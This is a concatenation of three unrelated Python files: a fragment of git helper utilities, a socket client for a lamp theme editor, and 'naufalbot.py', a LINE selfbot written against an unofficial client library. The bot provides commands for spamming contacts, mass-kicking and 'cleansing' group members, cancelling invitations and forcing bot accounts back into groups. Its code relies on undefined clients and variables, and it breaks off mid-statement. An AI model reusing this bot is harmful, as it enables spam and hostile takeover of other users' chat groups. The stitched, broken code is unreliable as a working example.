def inc(self, amount=1): self._count += amount def __enter__(self): self._thread.start() return self.inc def __exit__(self, _exc_type, _exc_value, _traceback): self._dead = True with self._dead_cond: self._dead_cond.notifyAll() self._thread.join() del self._thread def once(function): """@Decorates |function| so that it only performs its action once, no matter how many times the decorated |function| is called.""" has_run = [False] def _wrapper(*args, **kwargs): if not has_run[0]: has_run[0] = True function(*args, **kwargs) return _wrapper def unicode_repr(s): result = repr(s) return result[1:] if result.startswith('u') else result ## Git functions def die(message, *args): print(textwrap.dedent(message % args), file=sys.stderr) sys.exit(1) def blame(filename, revision=None, porcelain=False, abbrev=None, *_args): command = ['blame'] if porcelain: command.append('-p') if revision is not None: command.append(revision) if abbrev is not None: command.append('--abbrev=%d' % abbrev) command.extend(['--', filename]) return run(*command) def branch_config(branch, option, default=None): return get_config('branch.%s.%s' % (branch, option), default=default) def branch_config_map(option): """Return {branch: <|option| value>} for all branches.""" try: reg = re.compile(r'^branch\.(.*)\.%s$' % option) lines = get_config_regexp(reg.pattern) return {reg.match(k).group(1): v for k, v in (l.split() for l in lines)} except subprocess2.CalledProcessError: return {} def branches(use_limit=True, *args): NO_BRANCH = ('* (no branch', '* (detached', '* (HEAD detached') key = 'depot-tools.branch-limit' limit = get_config_int(key, 20) raw_branches = run('branch', *args).splitlines() num = len(raw_branches) if use_limit and num > limit: die("""\ Your git repo has too many branches (%d/%d) for this tool to work well. You may adjust this limit by running: git config %s <new_limit> You may also try cleaning up your old branches by running: git cl archive """, num, limit, key) for line in raw_branches: if line.startswith(NO_BRANCH): continue yield line.split()[-1] def get_config(option, default=None): try: return run('config', '--get', option) or default except subprocess2.CalledProcessError: return default def get_config_int(option, default=0): assert isinstance(default, int) try: return int(get_config(option, default)) except ValueError: return default def get_config_list(option): try: return run('config', '--get-all', option).split() except subprocess2.CalledProcessError: return [] def get_config_regexp(pattern): if IS_WIN: # pragma: no cover # this madness is because we call git.bat which calls git.exe which calls # bash.exe (or something to that effect). Each layer divides the number of # ^'s by 2. pattern = pattern.replace('^', '^' * 8) return run('config', '--get-regexp', pattern).splitlines() def current_branch(): try: return run('rev-parse', '--abbrev-ref', 'HEAD') except subprocess2.CalledProcessError: return None def del_branch_config(branch, option, scope='local'): del_config('branch.%s.%s' % (branch, option), scope=scope) def del_config(option, scope='local'): try: run('config', '--' + scope, '--unset', option) except subprocess2.CalledProcessError: pass def diff(oldrev, newrev, *args): return run('diff', oldrev, newrev, *args) def freeze(): took_action = False key = 'depot-tools.freeze-size-limit' MB = 2**20 limit_mb = get_config_int(key, 100) untracked_bytes = 0 root_path = repo_root() for f, s in status(): if is_unmerged(s): die("Cannot freeze unmerged changes!") if limit_mb > 0: if s.lstat == '?': untracked_bytes += os.stat(os.path.join(root_path, f)).st_size if limit_mb > 0 and untracked_bytes > limit_mb * MB: die("""\ You appear to have too much untracked+unignored data in your git checkout: %.1f / %d MB. Run `git status` to see what it is. In addition to making many git commands slower, this will prevent depot_tools from freezing your in-progress changes. You should add untracked data that you want to ignore to your repo's .git/info/exclude file. See `git help ignore` for the format of this file. If this data is indended as part of your commit, you may adjust the freeze limit by running: git config %s <new_limit> Where <new_limit> is an integer threshold in megabytes.""", untracked_bytes / (MB * 1.0), limit_mb, key) try: run('commit', '--no-verify', '-m', FREEZE + '.indexed') took_action = True except subprocess2.CalledProcessError: pass add_errors = False try: run('add', '-A', '--ignore-errors') except subprocess2.CalledProcessError: add_errors = True try: run('commit', '--no-verify', '-m', FREEZE + '.unindexed') took_action = True except subprocess2.CalledProcessError: pass ret = [] if add_errors: ret.append('Failed to index some unindexed files.') if not took_action: ret.append('Nothing to freeze.') return ' '.join(ret) or None def get_branch_tree(): """Get the dictionary of {branch: parent}, compatible with topo_iter. Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of branches without upstream branches defined. """ skipped = set() branch_tree = {} for branch in branches(): parent = upstream(branch) if not parent: skipped.add(branch) continue branch_tree[branch] = parent return skipped, branch_tree def get_or_create_merge_base(branch, parent=None): """Finds the configured merge base for branch. If parent is supplied, it's used instead of calling upstream(branch). """ base = branch_config(branch, 'base') base_upstream = branch_config(branch, 'base-upstream') parent = parent or upstream(branch) if parent is None or branch is None: return None actual_merge_base = run('merge-base', parent, branch) if base_upstream != parent: base = None base_upstream = None def is_ancestor(a, b): return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0 if base and base != actual_merge_base: if not is_ancestor(base, branch): logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base) base = None elif is_ancestor(base, actual_merge_base): logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base) base = None else: logging.debug('Found pre-set merge-base for %s: %s', branch, base) if not base: base = actual_merge_base manual_merge_base(branch, base, parent) return base def hash_multi(*reflike): return run('rev-parse', *reflike).splitlines() def hash_one(reflike, short=False): args = ['rev-parse', reflike] if short: args.insert(1, '--short') return run(*args) def in_rebase(): git_dir = run('rev-parse', '--git-dir') return ( os.path.exists(os.path.join(git_dir, 'rebase-merge')) or os.path.exists(os.path.join(git_dir, 'rebase-apply'))) def intern_f(f, kind='blob'): """Interns a file object into the git object store. Args: f (file-like object) - The file-like object to intern kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'. Returns the git hash of the interned object (hex encoded). """ ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f) f.close() return ret def is_dormant(branch): # TODO(iannucci): Do an oldness check? return branch_config(branch, 'dormant', 'false') != 'false' def is_unmerged(stat_value): return ( 'U' in (stat_value.lstat, stat_value.rstat) or ((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD') ) def manual_merge_base(branch, base, parent): set_branch_config(branch, 'base', base) set_branch_config(branch, 'base-upstream', parent) def mktree(treedict): """Makes a git tree object and returns its hash. See |tree()| for the values of mode, type, and ref. Args: treedict - { name: (mode, type, ref) } """ with tempfile.TemporaryFile() as f: for name, (mode, typ, ref) in treedict.items(): f.write(('%s %s %s\t%s\0' % (mode, typ, ref, name)).encode('utf-8')) f.seek(0) return run('mktree', '-z', stdin=f) def parse_commitrefs(*commitrefs): """Returns binary encoded commit hashes for one or more commitrefs. A commitref is anything which can resolve to a commit. Popular examples: * 'HEAD' * 'origin/master' * 'cool_branch~2' """ try: return [binascii.unhexlify(h) for h in hash_multi(*commitrefs)] except subprocess2.CalledProcessError: raise BadCommitRefException(commitrefs) RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr') def rebase(parent, start, branch, abort=False): """Rebases |start|..|branch| onto the branch |parent|. Args: parent - The new parent ref for the rebased commits. start - The commit to start from branch - The branch to rebase abort - If True, will call git-rebase --abort in the event that the rebase doesn't complete successfully. Returns a namedtuple with fields: success - a boolean indicating that the rebase command completed successfully. message - if the rebase failed, this contains the stdout of the failed rebase. """ try: args = ['--onto', parent, start, branch] if TEST_MODE: args.insert(0, '--committer-date-is-author-date') run('rebase', *args) return RebaseRet(True, '', '') except subprocess2.CalledProcessError as cpe: if abort: run_with_retcode('rebase', '--abort') # ignore failure return RebaseRet(False, cpe.stdout, cpe.stderr) def remove_merge_base(branch): del_branch_config(branch, 'base') del_branch_config(branch, 'base-upstream') def repo_root(): """Returns the absolute path to the repository root.""" return run('rev-parse', '--show-toplevel') def upstream_default(): """Returns the default branch name of the origin repository.""" try: return run('rev-parse', '--abbrev-ref', 'origin/HEAD') except subprocess2.CalledProcessError: return 'origin/master' def root(): return get_config('depot-tools.upstream', upstream_default()) @contextlib.contextmanager def less(): # pragma: no cover """Runs 'less' as context manager yielding its stdin as a PIPE. Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids running less and just yields sys.stdout. The returned PIPE is opened on binary mode. """ if not setup_color.IS_TTY: # On Python 3, sys.stdout doesn't accept bytes, and sys.stdout.buffer must # be used. yield getattr(sys.stdout, 'buffer', sys.stdout) return # Run with the same options that git uses (see setup_pager in git repo). # -F: Automatically quit if the output is less than one screen. # -R: Don't escape ANSI color codes. # -X: Don't clear the screen before starting. cmd = ('less', '-FRX') try: proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE) yield proc.stdin finally: try: proc.stdin.close() except BrokenPipeError: # BrokenPipeError is raised if proc has already completed, pass proc.wait() def run(*cmd, **kwargs): """The same as run_with_stderr, except it only returns stdout.""" return run_with_stderr(*cmd, **kwargs)[0] def run_with_retcode(*cmd, **kwargs): """Run a command but only return the status code.""" try: run(*cmd, **kwargs) return 0 except subprocess2.CalledProcessError as cpe: return cpe.returncode def run_stream(*cmd, **kwargs): """Runs a git command. Returns stdout as a PIPE (file-like object). stderr is dropped to avoid races if the process outputs to both stdout and stderr. """ kwargs.setdefault('stderr', subprocess2.VOID) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('shell', False) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd proc = subprocess2.Popen(cmd, **kwargs) return proc.stdout @contextlib.contextmanager def run_stream_with_retcode(*cmd, **kwargs): """Runs a git command as context manager yielding stdout as a PIPE. stderr is dropped to avoid races if the process outputs to both stdout and stderr. Raises subprocess2.CalledProcessError on nonzero return code. """ kwargs.setdefault('stderr', subprocess2.VOID) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('shell', False) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd try: proc = subprocess2.Popen(cmd, **kwargs) yield proc.stdout finally: retcode = proc.wait() if retcode != 0: raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), None, None) def run_with_stderr(*cmd, **kwargs): """Runs a git command. Returns (stdout, stderr) as a pair of strings. kwargs autostrip (bool) - Strip the output. Defaults to True. indata (str) - Specifies stdin data for the process. """ kwargs.setdefault('stdin', subprocess2.PIPE) kwargs.setdefault('stdout', subprocess2.PIPE) kwargs.setdefault('stderr', subprocess2.PIPE) kwargs.setdefault('shell', False) autostrip = kwargs.pop('autostrip', True) indata = kwargs.pop('indata', None) decode = kwargs.pop('decode', True) cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd proc = subprocess2.Popen(cmd, **kwargs) ret, err = proc.communicate(indata) retcode = proc.wait() if retcode != 0: raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err) if autostrip: ret = (ret or b'').strip() err = (err or b'').strip() if decode: ret = ret.decode('utf-8', 'replace') err = err.decode('utf-8', 'replace') return ret, err def set_branch_config(branch, option, value, scope='local'): set_config('branch.%s.%s' % (branch, option), value, scope=scope) def set_config(option, value, scope='local'): run('config', '--' + scope, option, value) def get_dirty_files(): # Make sure index is up-to-date before running diff-index. run_with_retcode('update-index', '--refresh', '-q') return run('diff-index', '--ignore-submodules', '--name-status', 'HEAD') def is_dirty_git_tree(cmd): w = lambda s: sys.stderr.write(s+"\n") dirty = get_dirty_files() if dirty: w('Cannot %s with a dirty tree. Commit, freeze or stash your changes first.' % cmd) w('Uncommitted files: (git diff-index --name-status HEAD)') w(dirty[:4096]) if len(dirty) > 4096: # pragma: no cover w('... (run "git diff-index --name-status HEAD" to see full output).') return True return False def status(): """Returns a parsed version of git-status. Returns a generator of (current_name, (lstat, rstat, src)) pairs where: * current_name is the name of the file * lstat is the left status code letter from git-status * rstat is the left status code letter from git-status * src is the current name of the file, or the original name of the file if lstat == 'R' """ stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src') def tokenizer(stream): acc = BytesIO() c = None while c != b'': c = stream.read(1) if c in (None, b'', b'\0'): if len(acc.getvalue()): yield acc.getvalue() acc = BytesIO() else: acc.write(c) def parser(tokens): while True: try: status_dest = next(tokens).decode('utf-8') except StopIteration: return stat, dest = status_dest[:2], status_dest[3:] lstat, rstat = stat if lstat == 'R': src = next(tokens).decode('utf-8') else: src = dest yield (dest, stat_entry(lstat, rstat, src)) return parser(tokenizer(run_stream('status', '-z', bufsize=-1))) def squash_current_branch(header=None, merge_base=None): header = header or 'git squash commit for %s.' % current_branch() merge_base = merge_base or get_or_create_merge_base(current_branch()) log_msg = header + '\n' if log_msg: log_msg += '\n' log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base) run('reset', '--soft', merge_base) if not get_dirty_files(): # Sometimes the squash can result in the same tree, meaning that there is # nothing to commit at this point. print('Nothing to commit; squashed branch is empty') return False run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg.encode('utf-8')) return True def tags(*args): return run('tag', *args).splitlines() def thaw(): took_action = False for sha in run_stream('rev-list', 'HEAD').readlines(): sha = sha.strip().decode('utf-8') msg = run('show', '--format=%f%b', '-s', 'HEAD') match = FREEZE_MATCHER.match(msg) if not match: if not took_action: return 'Nothing to thaw.' break run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha) took_action = True def topo_iter(branch_tree, top_down=True): """Generates (branch, parent) in topographical order for a branch tree. Given a tree: A1 B1 B2 C1 C2 C3 D1 branch_tree would look like: { 'D1': 'C3', 'C3': 'B2', 'B2': 'A1', 'C1': 'B1', 'C2': 'B1', 'B1': 'A1', } It is OK to have multiple 'root' nodes in your graph. if top_down is True, items are yielded from A->D. Otherwise they're yielded from D->A. Within a layer the branches will be yielded in sorted order. """ branch_tree = branch_tree.copy() # TODO(iannucci): There is probably a more efficient way to do these. if top_down: while branch_tree: this_pass = [(b, p) for b, p in branch_tree.items() if p not in branch_tree] assert this_pass, "Branch tree has cycles: %r" % branch_tree for branch, parent in sorted(this_pass): yield branch, parent del branch_tree[branch] else: parent_to_branches = collections.defaultdict(set) for branch, parent in branch_tree.items(): parent_to_branches[parent].add(branch) while branch_tree: this_pass = [(b, p) for b, p in branch_tree.items() if not parent_to_branches[b]] assert this_pass, "Branch tree has cycles: %r" % branch_tree for branch, parent in sorted(this_pass): yield branch, parent parent_to_branches[parent].discard(branch) del branch_tree[branch] def tree(treeref, recurse=False): """Returns a dict representation of a git tree object. Args: treeref (str) - a git ref which resolves to a tree (commits count as trees). recurse (bool) - include all of the tree's descendants too. File names will take the form of 'some/path/to/file'. Return format: { 'file_name': (mode, type, ref) } mode is an integer where: * 0040000 - Directory * 0100644 - Regular non-executable file * 0100664 - Regular non-executable group-writeable file * 0100755 - Regular executable file * 0120000 - Symbolic link * 0160000 - Gitlink type is a string where it's one of 'blob', 'commit', 'tree', 'tag'. ref is the hex encoded hash of the entry. """ ret = {} opts = ['ls-tree', '--full-tree'] if recurse: opts.append('-r') opts.append(treeref) try: for line in run(*opts).splitlines(): mode, typ, ref, name = line.split(None, 3) ret[name] = (mode, typ, ref) except subprocess2.CalledProcessError: return None return ret def get_remote_url(remote='origin'): try: return run('config', 'remote.%s.url' % remote) except subprocess2.CalledProcessError: return None def upstream(branch): try: return run('rev-parse', '--abbrev-ref', '--symbolic-full-name', branch+'@{upstream}') except subprocess2.CalledProcessError: return None def get_git_version(): """Returns a tuple that contains the numeric components of the current git version.""" version_string = run('--version') version_match = re.search(r'(\d+.)+(\d+)', version_string) version = version_match.group() if version_match else '' return tuple(int(x) for x in version.split('.')) def get_branches_info(include_tracking_status): format_string = ( '--format=%(refname:short):%(objectname:short):%(upstream:short):') # This is not covered by the depot_tools CQ which only has git version 1.8. if (include_tracking_status and get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover format_string += '%(upstream:track)' info_map = {} data = run('for-each-ref', format_string, 'refs/heads') BranchesInfo = collections.namedtuple( 'BranchesInfo', 'hash upstream ahead behind') for line in data.splitlines(): (branch, branch_hash, upstream_branch, tracking_status) = line.split(':') ahead_match = re.search(r'ahead (\d+)', tracking_status) ahead = int(ahead_match.group(1)) if ahead_match else None behind_match = re.search(r'behind (\d+)', tracking_status) behind = int(behind_match.group(1)) if behind_match else None info_map[branch] = BranchesInfo( hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind) # Set None for upstreams which are not branches (e.g empty upstream, remotes # and deleted upstream branches). missing_upstreams = {} for info in info_map.values(): if info.upstream not in info_map and info.upstream not in missing_upstreams: missing_upstreams[info.upstream] = None result = info_map.copy() result.update(missing_upstreams) return result def make_workdir_common(repository, new_workdir, files_to_symlink, files_to_copy, symlink=None): if not symlink: symlink = os.symlink os.makedirs(new_workdir) for entry in files_to_symlink: clone_file(repository, new_workdir, entry, symlink) for entry in files_to_copy: clone_file(repository, new_workdir, entry, shutil.copy) def make_workdir(repository, new_workdir): GIT_DIRECTORY_WHITELIST = [ 'config', 'info', 'hooks', 'logs/refs', 'objects', 'packed-refs', 'refs', 'remotes', 'rr-cache', ] make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST, ['HEAD']) def clone_file(repository, new_workdir, link, operation): if not os.path.exists(os.path.join(repository, link)): return link_dir = os.path.dirname(os.path.join(new_workdir, link)) if not os.path.exists(link_dir): os.makedirs(link_dir) src = os.path.join(repository, link) if os.path.islink(src): src = os.path.realpath(src) operation(src, os.path.join(new_workdir, link))
SClient.py
""" Circadia Theme Editor - socket client communicates with a remote server over sockets Author: fhu """ import threading import socket import json import pygame # # todo: implement remote sound. sound is currently played back locally # class CircadiaSocketClient: def __init__(self): self.addr = "0.0.0.0" self.port = 0 self.worker = None self.starttime = 0 self.success = 0 self.canvasW = 16 self.canvasH = 18 self.sounds = dict() pygame.mixer.pre_init(frequency=41000) pygame.init() def __del__(self): self.disconnect() def connect(self, addr, port): """ connect to the lamp, non blocking :param addr: ip address, string :param port: port, int :return: """ if self.isBusy(): return false self.addr = addr self.port = port self.success = 0 # send a greeting self.__sendMsg("hello") def disconnect(self): if self.isConnected(): self.__sendMsg('reset') def isConnected(self): """ find out if the lamp is talking :return: lamp is connected, bool """ if not self.isBusy(): return self.success > 0 else: return False def isBusy(self): """ find out if a transmission is in progress :return: """ if not self.worker: return False if self.worker[0].isAlive(): return True if self.worker[2] == "ok": self.success += 1 elif self.worker[2][:3] == "cfg": tok = self.worker[2].split(':') self.canvasW = int(tok[1]) self.canvasH = int(tok[2]) self.success += 1 print 'received dim', self.canvasW, self.canvasH else: self.success = 0 print self.worker[2] self.worker = None def startSoundLoop(self, hash, filename, volume): print 'starting', filename, 'on', hash # (filename, soundobject) if hash in self.sounds: soundRecord = self.sounds[hash] playing = soundRecord[1].get_num_channels() > 0 if soundRecord[0] != filename: if playing: soundRecord[1].fadeout(800) soundRecord[0] = filename soundRecord[1] = pygame.mixer.Sound(filename) soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) else: soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) else: self.sounds[hash] = [0, 0, 0] soundRecord = self.sounds[hash] soundRecord[0] = filename soundRecord[1] = pygame.mixer.Sound(filename) soundRecord[1].play(loops=-1) soundRecord[1].set_volume(volume) def stopSoundLoop(self, hash): print 'stopping', hash if hash in self.sounds: self.sounds[hash][1].fadeout(800) def setSoundVolume(self, hash, volume): if hash in self.sounds: self.sounds[hash][1].set_volume(volume) def sendGradient(self, grad): """ :param grad: list of 18 colors [ [r0,g0,b0], [r1,g1,b1], ...] :return: busy state """ buff = json.dumps(grad) return self.__sendMsg('grad:'+buff) def sendCanvas(self, canvas): """ :param canvas: list of 18*16 colors [ r0,g0,b0, r1,g1,b1, ...] :return: busy state """ buff = json.dumps(canvas) return self.__sendMsg('cnv:'+buff) def __sendMsg(self, msg): if self.isBusy(): return False job = ['thread', msg, None] t = threading.Thread(target=self.__dispatch, args=(self.addr, self.port, job)) job[0] = t t.start() self.worker = job return True @staticmethod def __dispatch(addr, port, msg): """ worker :param addr: :param port: :param msg: list (thread obj, message, return value) :return: """ print 'opening socket' clientsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) clientsocket.settimeout(2) try: clientsocket.connect((addr, port)) except: msg[2] = "couldn't connect to socket" return print 'sending' n = clientsocket.sendall(msg[1]) clientsocket.shutdown(socket.SHUT_WR) print 'sent', n buffer = "" while(1): buf = clientsocket.recv(1024) if len(buf) > 0: buffer += buf else: print 'received %d bytes'%len(buffer) msg[2] = buffer break clientsocket.close() print 'done' __author__ = 'fhu'
naufalbot.py
# -*- coding: utf-8 -*- import LINETCR from LINETCR.lib.curve.ttypes import * from datetime import datetime import time,random,sys,json,codecs,threading,glob,re cl = LINETCR.LINE() cl.login(qr=True) cl.loginResult() print "login success" reload(sys) sys.setdefaultencoding('utf-8') helpMessage =""" Naufal Bot ¤ Id︎ ¤ Mid ¤ Me︎ ¤ TL︎:「Text」 ¤ Mc 「mid」 ¤ K on/off ¤ Join︎ on/off ¤ Gcancel:︎「Number of people」 ¤ Group cancelalll︎ ¤ Leave︎ on/off ¤ Add on/off ¤ Share on/off ¤ Message change:「text」 ¤ Message check ¤ Confirm ¤ Jam on/off ¤ Change clientock:「name」 ¤ Up ¤ Cv join ¤ Command in the groups ¤ ¤ Urloff ¤ Urlon ¤ url ¤ url:「Group ID」 ¤ Invite:「mid」 ¤ Kick:「mid」 ¤ Ginfo ¤ Cancel ¤ Gn 「group name」 ¤ Nk 「name」 ¤ Tag all ¤ Mid @ ¤ Bye @ ¤ Pembuat bot ¤ Spamcontact @ ¤ Cleanse ¤ List group ¤ Group bc ¤ Setlastpoint ¤ Viewlastseen ¤ winvite : [Kontak] ¤ Command kicker only ¤ ¤ Bye ¤ Kill ban ¤ Kill @「Tag」 ¤ Ban @「Tag」 ¤ Unban @「Tag」 ¤ Ban︎ [Share Contact] ¤ Unban︎ [Share Contact] ¤ Banlist︎ ¤ Cek ban ¤ mid ¤ invite:「mid」 ¤ rename:「name」 ¤ gift ¤ Respo︎n ¤ Bot cancel ¤ Title: ¤ Gua Mau Masuk Team Kamu """ KAC=[cl] mid = cl.getProfile().mid Bots=[mid] admin=["uc8e2c2b906e2322592c6d8f91a0957f7"] wait = { 'contact':False, 'autoJoin':True, 'autoCancel':{"on":True,"members":1}, 'leaveRoom':True, 'timeline':True, 'autoAdd':True, 'message':"Owner. ID Line : naufal_opalminecraft", "lang":"JP", "comment":"Owner. ID Line : NaufalOpalMinecraft", "commentOn":True, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "blacklist":{}, "wblacklist":False, "dblacklist":False, "protectionOn":True, "atjointicket":True } wait2 = { 'readPoint':{}, 'readMember':{}, 'setTime':{}, 'ROM':{} } setTime = {} setTime = wait2['setTime'] def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def NOTIFIED_READ_MESSAGE(op): try: if op.param1 in wait2['readPoint']: Name = cl.getContact(op.param2).displayName if Name in wait2['readMember'][op.param1]: pass else: wait2['readMember'][op.param1] += "\n・" + Name wait2['ROM'][op.param1][op.param2] = "・" + Name else: pass except: pass def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) #------Open QR Kick start------# if op.type == 10: if wait["ProtectQR"] == True: if op.param2 not in Bots: G = cl.getGroup(op.param1) G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.kickoutFromGroup(op.param1,[op.param2]) cl.updateGroup(G) #------Open QR Kick finish-----# #------Invite User Kick start------# if op.type == 13: if wait["Protectguest"] == True: if op.param2 not in Bots: random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3]) random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) #------Invite User Kick Finish------# if op.type == 17: if op.param2 not in Bots: joinblacklist = op.param2.replace("¡¤",',') joinblacklistX = joinblacklist.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, joinblacklistX) if matched_list == []: pass else: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) if op.type == 17: group = random.choice(KAC).getGroup(op.param1) cb = Message() cb.to = op.param1 cb.text = random.choice(KAC).getContact(op.param2).displayName + " [NewMemb]\n\nSelamat Datang" + random.choice(KAC).getContact(op.param2).displayName + " di [" + group.name + "]\nJangan Spam ya" + "\n\nCreator Group => " + group.creator.displayName random.choice(KAC).sendMessage(cb) if op.type == 15: if op.param2 in Bots: return ki.sendText(op.param1, random.choice(KAC).getContact(op.param2).displayName + " Good Bye Kaka" ) print "MemberLeft" if op.type == 13: if op.param3 in mid: if op.param2 in Amid: G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ticket) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) if op.param3 in Amid: if op.param2 in Bmid: X = kk.getGroup(op.param1) X.preventJoinByTicket = False kk.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) ki.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True kk.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) if op.param3 in Bmid: if op.param2 in Cmid: X = kc.getGroup(op.param1) X.preventJoinByTicket = False kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) kk.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) if op.param3 in Cmid: if op.param2 in mid: X = cl.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) kc.acceptGroupInvitationByTicket(op.param1,Ti) X.preventJoinByTicket = True cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) if op.type == 13: print op.param1 print op.param2 print op.param3 if mid in op.param3: G = cl.getGroup(op.param1) if wait["autoJoin"] == True: if wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) elif wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: Inviter = op.param3.replace("",',') InviterX = Inviter.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, InviterX) if matched_list == []: pass else: cl.cancelGroupInvitation(op.param1, matched_list) if op.type == 19: if mid in op.param3: if op.param2 in Bots: pass try: ki.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True G = ki.getGroup(op.param1) G.preventJoinByTicket = False ki.updateGroup(G) Ti = ki.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) X = cl.getGroup(op.param1) X.preventJoinByTicket = True cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Amid in op.param3: if op.param2 in Bots: pass try: kk.kickoutFromGroup(op.param1,[op.param2]) kc.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = kk.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = kk.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) G = ki.getGroup(op.param1) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = ki.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Bmid in op.param3: if op.param2 in Bots: pass try: kc.kickoutFromGroup(op.param1,[op.param2]) kk.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = kc.getGroup(op.param1) X.preventJoinByTicket = False kc.updateGroup(X) Ti = kc.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) G = kk.getGroup(op.param1) G.preventJoinByTicket = True kk.updateGroup(G) Ticket = kk.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if Cmid in op.param3: if op.param2 in Bots: pass try: cl.kickoutFromGroup(op.param1,[op.param2]) kk.kickoutFromGroup(op.param1,[op.param2]) except: try: random.choice(KAC).kickoutFromGroup(op.param1,[op.param2]) except: print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。") if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True X = cl.getGroup(op.param1) X.preventJoinByTicket = False cl.updateGroup(X) Ti = cl.reissueGroupTicket(op.param1) cl.acceptGroupInvitationByTicket(op.param1,Ti) 